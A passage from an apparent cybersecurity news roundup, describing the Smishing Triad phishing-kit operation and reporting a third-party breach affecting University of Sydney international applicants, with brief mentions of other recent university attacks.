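The same tautology that lets a researcher pull every record lets the kit’s authors do so too, which is the basis for the speculation that the flaw doubles as a covert channel for harvesting their customers’ captures.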
The Telegram group associated with Smishing Triad includes graphic designers, web developers, and sales people, who oversee the development of high-quality phishing kits as well as their marketing on dark web cybercrime forums.
Multiple Vietnamese-speaking members of the group have been observed collaborating with the primary threat actors in these efforts, with the latter also collaborating with similar financially motivated groups to scale their operations.
Package tracking text scams notwithstanding, Smishing Triad is also known to indulge in Magecart-like attacks that infect online shopping platforms with malicious code injections to intercept customer data.
University of Sydney Data Breach Impacts Recent Applicants
The University of Sydney (USYD) announced that a breach at a third-party service provider exposed personal information of international applicants who recently applied or enrolled. The public university was founded in 1850 and has nearly 70,000 students and about 8,500 academic and administrative personnel. It is considered one of Australia’s most important educational institutes.
In the data breach announcement, the university says that the incident had a limited impact and that the preliminary investigation found no evidence that local students, staff, or alumni have been impacted.
“The issue was isolated to a single platform and had no impact on other University systems. There is currently no evidence that any personal information has been misused” – University of Sydney
It is unclear if the intruder picked the time of the attack deliberately or whether it was an opportunistic endeavor. The university says that those impacted will be contacted and will receive the required support to mitigate the risk of exposure.
Regarding the data the attacker accessed, USYD says it is still in the process of determining that and urges all international applicants to follow the guidance provided on its website.
The public disclosure does not clarify when the breach occurred or what third-party service was hacked. At this time, there are no announcements about a disruption in USYD’s systems, however, students should remain vigilant and treat unsolicited communications with caution.
Earlier this week, the University of Michigan announced it had to shut down its operation-critical systems to deal with a serious cybersecurity incident.
In June, the University of Manchester suffered a data breach in which hackers stole an undisclosed amount of data from its networks. Earlier in 2023, ransomware gangs attacked and disrupted the operations of the Queensland University of Technology, the Open University of Cyprus, and Bluefield University.